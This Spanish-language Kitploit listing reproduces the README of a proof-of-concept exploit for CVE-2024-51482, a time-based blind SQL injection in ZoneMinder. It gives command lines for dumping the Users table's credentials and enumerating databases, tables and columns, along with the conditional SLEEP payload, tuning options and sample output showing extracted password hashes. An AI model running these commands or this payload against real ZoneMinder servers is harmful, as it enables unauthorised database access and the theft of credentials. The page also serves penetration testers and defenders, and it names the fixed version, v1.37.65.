Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-51482-PoC — PoC autenticado de inyección SQL ciega basada en tiempo para ZoneMinder CVE-2024-51482 (v1.37.* <= 1.37.64) | Kitploit
Herramientas/GitHubGitHub/plur1bu5/cve-2024-51482-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubplur1bu5/cve-2024-51482-poc

CVE-2024-51482-PoC

PoC autenticado de inyección SQL ciega basada en tiempo para ZoneMinder CVE-2024-51482 (v1.37.* <= 1.37.64)

Ver Repositorio
14hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-51482-PoC

Exploit autenticado de inyección SQL ciega basada en tiempo para ZoneMinder v1.37. <= 1.37.64*

Resumen

Esta es una prueba de concepto (PoC) para CVE-2024-51482, una vulnerabilidad de inyección SQL ciega basada en tiempo en la funcionalidad de gestión de eventos de ZoneMinder. El exploit requiere autenticación y utiliza consultas SLEEP condicionales para extraer datos de la base de datos.

Características

  • Explotación autenticada - Inicia sesión con credenciales o cookie de sesión Detección de longitud - Búsqueda binaria para encontrar la longitud exacta de la cadena antes de la extracción
  • Extracción paralela - Extracción de caracteres con múltiples hilos para mayor velocidad
  • Opciones estilo sqlmap - Enumera bases de datos, tablas, columnas y vuelca datos
  • Valores predeterminados seguros - 3s de retardo, 5 hilos para alta precisión
  • Seguimiento del progreso - Progreso de extracción en tiempo real con modo verbose
  • Salida limpia - Visualización de datos volcados en formato de tabla

Requisitos

pip install requests

Inicio rápido

Modo predeterminado: volcar credenciales

python3 poc.py -t example.local -u admin -p password

Con cookie de sesión

python3 poc.py -t example.local --cookie 'ZMSESSID_value'

Modo verbose

python3 poc.py -t example.local -u admin -p password -v

Uso

Enumerar bases de datos

python3 poc.py -t example.local -u admin -p password --dbs

Enumerar tablas

python3 poc.py -t example.local -u admin -p password -D zm --tables

Enumerar columnas

python3 poc.py -t example.local -u admin -p password -D zm -T Users --columns

Volcar una tabla específica

python3 poc.py -t example.local -u admin -p password -D zm -T Users --dump

Opciones

Required:
  -t, --target TARGET       Target URL (IP, hostname, or full URL)
  
Authentication:
  -u, --username USERNAME   Username for authentication
  -p, --password PASSWORD   Password for authentication
  --cookie COOKIE           Session cookie (ZMSESSID)

Enumeration:
  --dbs                     Enumerate databases
  -D, --database DATABASE   Database to use
  --tables                  Enumerate tables
  -T, --table TABLE         Table to use
  --columns                 Enumerate columns
  --dump                    Dump table data

Performance:
  --delay DELAY             Time delay in seconds (default: 3, safe)
  --threads THREADS         Number of threads (default: 5, safe)
  -v, --verbose             Show extraction progress

Ajuste de rendimiento

Modo seguro (recomendado)

python3 poc.py -t example.local -u admin -p password --delay 3 --threads 5
  • Velocidad: ~2-3 minutos por hash de contraseña
  • Precisión: Alta

Modo rápido (puede tener errores)

python3 poc.py -t example.local -u admin -p password --delay 1 --threads 20
  • Velocidad: ~30-60 segundos por hash de contraseña
  • Precisión: Puede producir caracteres incorrectos

Ejemplo de salida

[*] Target: http://example.local
[*] Delay: 3s | Threads: 5
[+] Authenticated as admin
[*] Testing vulnerability...
[+] Target is VULNERABLE!

[*] Default mode: Dumping zm.Users credentials...
[*] Dumping data from 'zm.Users'...
[+] Extracted: admin
[+] Extracted: $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm
[+] Extracted: john
[+] Extracted: $2y$10$prZGnazejKcaLq9bKNexXOglBSqOl1hq07LW7AJ/QNqZolbXKfFG.

====================================================================================
| Username   | Password                                                      |
====================================================================================
| admin      | $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm |
| john       | $2y$10$prABlsrtyjkiWv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG. |
====================================================================================

[+] 2 entries dumped

Cómo funciona

  1. Autenticación - Inicia sesión con credenciales o utiliza la cookie de sesión proporcionada
  2. Prueba de vulnerabilidad - Confirma que el objetivo es vulnerable con una carga útil SLEEP simple
  3. Detección de longitud - Utiliza búsqueda binaria para encontrar la longitud exacta de la cadena
  4. Extracción paralela - Extrae todas las posiciones de caracteres simultáneamente
  5. Visualización de datos - Formatea los resultados en una tabla limpia

Formato de la carga útil

El exploit utiliza SLEEP condicional:

1 AND (SELECT 1 FROM (SELECT(SLEEP(3-(IF(condition,0,3)))))test)
  • Condición TRUE: Sin retardo (0 segundos)
  • Condición FALSE: Retardo completo (3 segundos)

Solución de problemas

Resultados inexactos

Si obtienes caracteres incorrectos (p. ej., $ se convierte en 8):

# Aumenta el retardo y reduce los hilos
python3 poc.py -t example.local -u admin -p password --delay 4 --threads 3

Demasiado lento

Si la extracción es demasiado lenta:

# Disminuye el retardo y aumenta los hilos (puede reducir la precisión)
python3 poc.py -t example.local -u admin -p password --delay 2 --threads 10

No se encontraron datos

Si la tabla predeterminada zm.Users no existe:

# Enumera primero las bases de datos
python3 poc.py -t example.local -u admin -p password --dbs

# Luego enumera las tablas
python3 poc.py -t example.local -u admin -p password -D database_name --tables

Información CVE

  • ID CVE: CVE-2024-51482
  • Versiones afectadas: ZoneMinder v1.37.* <= 1.37.64
  • Corregido en: v1.37.65
  • Tipo de vulnerabilidad: Inyección SQL ciega basada en tiempo
  • Puntuación CVSS: Por determinar

Descargo de responsabilidad

Esta herramienta es solo para fines educativos y de pruebas de seguridad autorizadas.

  • No utilices esta herramienta contra sistemas que no te pertenezcan o para los que no tengas permiso explícito de prueba
  • El acceso no autorizado a sistemas informáticos es ilegal
  • El autor no es responsable del mal uso o los daños causados por esta herramienta
  • Obtén siempre la autorización adecuada antes de realizar evaluaciones de seguridad

Referencias

  • NVD - CVE-2024-51482
  • ZoneMinder GitHub

Licencia

Este proyecto se proporciona únicamente con fines educativos. Úsalo de forma responsable y ética.


⭐ Si te resulta útil, ¡dale una estrella al repositorio!

Descargar herramienta